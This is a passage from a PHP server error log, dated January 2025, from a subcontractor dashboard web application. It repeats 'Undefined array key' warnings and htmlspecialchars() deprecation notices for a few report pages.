/home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Jan-2025 13:15:41 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Jan-2025 13:16:32 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Jan-2025 13:16:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Jan-2025 13:16:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Jan-2025 13:36:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Jan-2025 13:44:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Jan-2025 14:14:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Jan-2025 22:44:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Jan-2025 23:33:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Jan-2025 23:34:04 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Jan-2025 23:39:35 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Jan-2025 23:47:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Jan-2025 23:50:18 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 00:12:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 01:27:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 01:44:13 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 01:45:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 01:46:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 01:48:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 02:00:32 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 02:19:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 02:42:04 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 02:53:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 03:30:46 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 03:47:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 03:53:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 03:55:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 04:00:13 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 04:56:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 04:56:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 05:30:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 05:39:48 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 05:43:42 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 06:05:48 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 06:14:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 06:23:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 07:21:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 11:36:48 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 20:46:05 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 23:03:05 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 23:17:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 23:26:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Jan-2025 23:30:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 00:20:36 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 02:11:05 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 02:16:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 03:36:03 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 03:39:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 03:49:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 04:04:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 04:10:08 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 04:34:36 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 04:48:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 05:09:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 05:44:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 05:44:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 05:45:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 06:17:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 06:44:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 06:48:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 07:12:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 08:40:18 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 09:51:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 09:54:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 11:09:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 20:00:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 20:00:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 20:00:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 20:44:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 23:08:42 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Jan-2025 23:19:36 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 00:41:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 00:56:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 01:12:43 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 01:28:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 01:44:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 02:55:35 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 03:02:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 03:31:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 03:31:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Jan-2025 03:31:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Jan-2025 03:32:01 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Jan-2025 03:32:01 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Jan-2025 03:32:34 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Jan-2025 03:32:34 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Jan-2025 04:07:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Jan-2025 04:07:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Jan-2025 04:07:32 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Jan-2025 04:07:32 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Jan-2025 04:07:35 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Jan-2025 04:07:35 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Jan-2025 04:07:38 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Jan-2025 04:07:38 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Jan-2025 04:31:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 04:35:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 05:32:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 05:34:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 05:43:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 05:44:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 07:14:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 07:55:08 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 08:31:53 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 08:35:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 15:20:41 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 21:02:53 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 23:32:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Jan-2025 23:49:41 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 00:21:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 00:34:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 00:38:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 01:33:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 02:19:07 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 02:20:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 02:21:18 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 02:58:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 03:10:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 04:16:46 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 04:46:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 05:25:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 05:35:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 05:57:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 06:28:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 06:35:18 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 06:36:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 06:48:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 07:00:05 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 07:02:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 09:06:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 09:18:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 15:11:13 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Jan-2025 23:28:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 00:12:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 01:08:32 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 01:24:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 01:29:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 02:23:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 03:10:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 03:38:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 03:40:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 03:42:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 03:42:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 04:21:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 04:22:18 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 04:22:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 04:25:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 05:21:58 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 06:24:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 06:37:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 07:05:07 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Jan-2025 07:22:42 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Jan-2025 12:29:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Jan-2025 12:32:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [12-Jan-2025 04:14:58 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [12-Jan-2025 06:55:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [12-Jan-2025 12:21:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [12-Jan-2025 21:42:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [12-Jan-2025 22:10:58 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [12-Jan-2025 22:27:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [12-Jan-2025 23:25:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [12-Jan-2025 23:32:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 00:17:13 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 00:21:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 00:35:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 00:49:48 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 00:55:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 01:45:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 02:28:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 02:29:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 03:26:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 03:26:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 05:03:53 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 05:04:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 05:21:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 05:21:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 05:22:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 05:23:31 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [13-Jan-2025 05:23:31 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [13-Jan-2025 05:23:49 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [13-Jan-2025 05:23:49 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [13-Jan-2025 05:23:59 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [13-Jan-2025 05:23:59 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [13-Jan-2025 05:24:47 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [13-Jan-2025 05:24:47 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [13-Jan-2025 05:24:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 05:24:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 05:24:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 05:38:46 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 06:25:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 11:26:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 11:31:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [13-Jan-2025 22:30:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 00:14:23 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 00:50:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 00:50:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 00:51:04 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 02:24:58 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 03:52:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [14-Jan-2025 05:29:44 UTC] PHP Warning: Undefined array key "pending" in 